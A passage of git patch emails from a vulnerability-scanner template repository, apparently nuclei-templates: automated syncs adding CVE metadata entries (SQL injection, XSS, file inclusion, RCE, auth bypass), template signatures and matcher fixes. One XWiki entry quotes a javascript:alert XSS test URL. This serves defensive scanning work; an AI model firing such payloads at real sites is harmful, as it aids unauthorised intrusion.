00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:47:05 +0000 Subject: [PATCH 1068/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a50431838e..353817cd75 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'http/cves/2023/CVE-2023-35158.yaml' - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' + - 'http/cves/2023/CVE-2023-44813.yaml' - 'http/cves/2023/CVE-2023-45855.yaml' - 'http/cves/2023/CVE-2023-5991.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' From 72c6d1ba3c7ce2138c10864da6f6be1638edff87 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:47:46 +0000 Subject: [PATCH 1069/1768] Auto Generated cves.json [Wed May 15 06:47:46 UTC 2024] :robot: --- cves.json | 8 ++++++++ cves.json-checksum.txt | 2 +- 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index e0e8c711e5..160b9d0298 100644 --- a/cves.json +++ b/cves.json @@ -2115,6 +2115,7 @@ {"ID":"CVE-2023-29622","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29622.yaml"} {"ID":"CVE-2023-29623","Info":{"Name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","Severity":"medium","Description":"Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29623.yaml"} {"ID":"CVE-2023-2982","Info":{"Name":"Miniorange Social Login and Register \u003c= 7.6.3 - Authentication Bypass","Severity":"critical","Description":"The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2982.yaml"} +{"ID":"CVE-2023-29827","Info":{"Name":"Embedded JavaScript(EJS) 3.1.6 - Template Injection","Severity":"critical","Description":"ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29827.yaml"} {"ID":"CVE-2023-29887","Info":{"Name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","Severity":"high","Description":"A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-29887.yaml"} {"ID":"CVE-2023-29919","Info":{"Name":"SolarView Compact \u003c= 6.00 - Local File Inclusion","Severity":"critical","Description":"There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-29919.yaml"} {"ID":"CVE-2023-29922","Info":{"Name":"PowerJob V4.3.1 - Authentication Bypass","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-29922.yaml"} @@ -2174,6 +2175,7 @@ {"ID":"CVE-2023-34993","Info":{"Name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","Severity":"critical","Description":"A improper neutralization of special elements used in an os command ('os\ncommand injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and\n8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands\nSuccessful exploitation of this vulnerability could allow an attacker to\nbypass authentication and gain unauthorized access to the affected system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34993.yaml"} {"ID":"CVE-2023-35078","Info":{"Name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35078.yaml"} {"ID":"CVE-2023-35082","Info":{"Name":"MobileIron Core - Remote Unauthenticated API Access","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35082.yaml"} +{"ID":"CVE-2023-35158","Info":{"Name":"XWiki - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: \u003e /xwiki/bin/view/XWiki/Main?xpage=restore\u0026showBatch=true\u0026xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35158.yaml"} {"ID":"CVE-2023-35813","Info":{"Name":"Sitecore - Remote Code Execution","Severity":"critical","Description":"Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35813.yaml"} {"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"} {"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"} @@ -2183,6 +2185,7 @@ {"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"} {"ID":"CVE-2023-36306","Info":{"Name":"Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting","Severity":"medium","Description":"A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36306.yaml"} {"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross Site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"} +{"ID":"CVE-2023-36347","Info":{"Name":"POS Codekop v2.0 - Broken Authentication","Severity":"high","Description":"A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-36347.yaml"} {"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"medium","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"} {"ID":"CVE-2023-36845","Info":{"Name":"Juniper J-Web - Remote Code Execution","Severity":"critical","Description":"A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-36845.yaml"} {"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"} @@ -2268,6 +2271,7 @@ {"ID":"CVE-2023-44353","Info":{"Name":"Adobe ColdFusion WDDX Deserialization Gadgets","Severity":"critical","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-44353.yaml"} {"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"} {"ID":"CVE-2023-44812","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44812.yaml"} +{"ID":"CVE-2023-44813","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"Cross-Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44813.yaml"} {"ID":"CVE-2023-4521","Info":{"Name":"Import XML and RSS Feeds \u003c 2.1.5 - Unauthenticated RCE","Severity":"critical","Description":"The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4521.yaml"} {"ID":"CVE-2023-45375","Info":{"Name":"PrestaShop PireosPay - SQL Injection","Severity":"high","Description":"In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-45375.yaml"} {"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"} @@ -2275,6 +2279,7 @@ {"ID":"CVE-2023-45671","Info":{"Name":"Frigate \u003c 0.13.0 Beta 3 - Cross-Site Scripting","Severity":"medium","Description":"Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/\u003ccamera_name\u003e` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-45671.yaml"} {"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"} {"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"} +{"ID":"CVE-2023-45855","Info":{"Name":"qdPM 9.2 - Directory Traversal","Severity":"high","Description":"qdPM 9.2 allows Directory Traversal to list files and directories by navigating to the /uploads URI.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-45855.yaml"} {"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"} {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} {"ID":"CVE-2023-46347","Info":{"Name":"PrestaShop Step by Step products Pack - SQL Injection","Severity":"critical","Description":"In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46347.yaml"} @@ -2310,6 +2315,7 @@ {"ID":"CVE-2023-5556","Info":{"Name":"Structurizr on-premises - Cross Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5556.yaml"} {"ID":"CVE-2023-5830","Info":{"Name":"ColumbiaSoft DocumentLocator - Improper Authentication","Severity":"critical","Description":"Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5830.yaml"} {"ID":"CVE-2023-5914","Info":{"Name":"Citrix StoreFront - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5914.yaml"} +{"ID":"CVE-2023-5991","Info":{"Name":"Hotel Booking Lite \u003c 4.8.5 - Arbitrary File Download \u0026 Deletion","Severity":"critical","Description":"The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5991.yaml"} {"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"} {"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"} {"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"} @@ -2348,6 +2354,7 @@ {"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"} {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"} {"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"} +{"ID":"CVE-2024-1561","Info":{"Name":"Gradio Applications - Local File Read","Severity":"high","Description":"Local file read by calling arbitrary methods of Components class\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1561.yaml"} {"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"} {"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"} {"ID":"CVE-2024-20767","Info":{"Name":"Adobe ColdFusion - Arbitrary File Read","Severity":"high","Description":"ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-20767.yaml"} @@ -2380,6 +2387,7 @@ {"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"critical","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"} {"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"} {"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"} +{"ID":"CVE-2024-3097","Info":{"Name":"NextGEN Gallery \u003c= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","Severity":"medium","Description":"The WordPress Gallery Plugin – NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3097.yaml"} {"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"} {"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"} {"ID":"CVE-2024-31848","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31848.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 47012701c5..341b934c1f 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -235e457ee422c2956ae8e7b3cc7ca1d6 +6cee9d81045ba3fb25589784532a78e4 From e7ea6752ca30996eb12a320987aebf171aa4f6d3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:48:11 +0000 Subject: [PATCH 1070/1768] Auto Template Signing [Wed May 15 06:48:11 UTC 2024] :robot: --- http/cves/2023/CVE-2023-29827.yaml | 1 + http/cves/2023/CVE-2023-44813.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2023/CVE-2023-29827.yaml b/http/cves/2023/CVE-2023-29827.yaml index 5549e07aba..46f7357b4a 100644 --- a/http/cves/2023/CVE-2023-29827.yaml +++ b/http/cves/2023/CVE-2023-29827.yaml @@ -45,3 +45,4 @@ http: part: body words: - "You are viewing page number" +# digest: 4b0a00483046022100d7ea0d1d7ce9e00af5998f5fa4b5960a70b471e26ecf0caf0577424bace640e0022100ba8f5c9f03136d87aa25b2eab3b136501334d2a57e61dbf0d049f384be7946e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44813.yaml b/http/cves/2023/CVE-2023-44813.yaml index 88f1ab7886..e8a8a086ed 100644 --- a/http/cves/2023/CVE-2023-44813.yaml +++ b/http/cves/2023/CVE-2023-44813.yaml @@ -49,3 +49,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100acfa09d8753734777ae264a34a2301092b20f0e9752d3c46a2c1cd62a768413a02204a56fbddcb961f4ecc0a6a20bde95cc3eaef3f8e5f60254eec300b6c960addbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ce59c1b9b852cab0a0ea8c4e13b279c48816f4fb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 13:32:08 +0530 Subject: [PATCH 1071/1768] Fix FN matcher --- http/technologies/boa-web-server.yaml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/http/technologies/boa-web-server.yaml b/http/technologies/boa-web-server.yaml index ecde83d378..109d3bcf30 100644 --- a/http/technologies/boa-web-server.yaml +++ b/http/technologies/boa-web-server.yaml @@ -30,10 +30,6 @@ http: regex: - "Server: Boa/" - - type: status - status: - - 200 - extractors: - type: kval part: header From d81058bda39707c23ee1306ad39511e7298b5f49 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 13:34:24 +0530 Subject: [PATCH 1072/1768] extra matcher removed --- .../exposed-panels/fortinet/f5-next-central-manager.yaml | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) diff --git a/http/exposed-panels/fortinet/f5-next-central-manager.yaml b/http/exposed-panels/fortinet/f5-next-central-manager.yaml index 20b89da3fe..02873fe6ad 100644 --- a/http/exposed-panels/fortinet/f5-next-central-manager.yaml +++ b/http/exposed-panels/fortinet/f5-next-central-manager.yaml @@ -1,7 +1,7 @@ id: f5-next-central-manager info: - name: F5 Next Central Manager Login Panel - Detect + name: F5 Next Central Manager Panel - Detect author: EgemenKochisarli severity: info description: | @@ -28,12 +28,7 @@ http: matchers: - type: word words: - - "<title>BIG-IP Next | Central Manager" - - - type: word - part: header - words: - - "text/html" + - "BIG-IP Next | Central Manager" - type: status status: From f89e250ba8d6ecf276b1fae3eac2865a1bd48cee Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 08:10:27 +0000 Subject: [PATCH 1073/1768] Auto Generated New Template Addition List [Wed May 15 08:10:27 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3311911a44..535664e426 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ http/default-logins/softether/softether-vpn-default-login.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml http/exposed-panels/easyvista-panel.yaml +http/exposed-panels/fortinet/f5-next-central-manager.yaml http/exposed-panels/ghost-panel.yaml http/exposed-panels/matomo-panel.yaml http/exposed-panels/n8n-panel.yaml From 7da663c1e8e57e9dddf8da5456e42ae36f7fa589 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 08:11:02 +0000 Subject: [PATCH 1074/1768] Auto Generated New Template Addition List [Wed May 15 08:11:02 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 535664e426..119242db54 100644 --- a/.new-additions +++ b/.new-additions @@ -29,6 +29,7 @@ http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml http/technologies/apache/apache-answer-detect.yaml +http/technologies/boa-web-server.yaml http/technologies/craftercms-detect.yaml http/technologies/imgproxy-detect.yaml http/technologies/statamic-detect.yaml From 7b3634d648d8a0c8d40a0c4db2c74c6bf800c7ec Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 08:11:09 +0000 Subject: [PATCH 1075/1768] Auto Generated Templates Checksum [Wed May 15 08:11:09 UTC 2024] :robot: --- 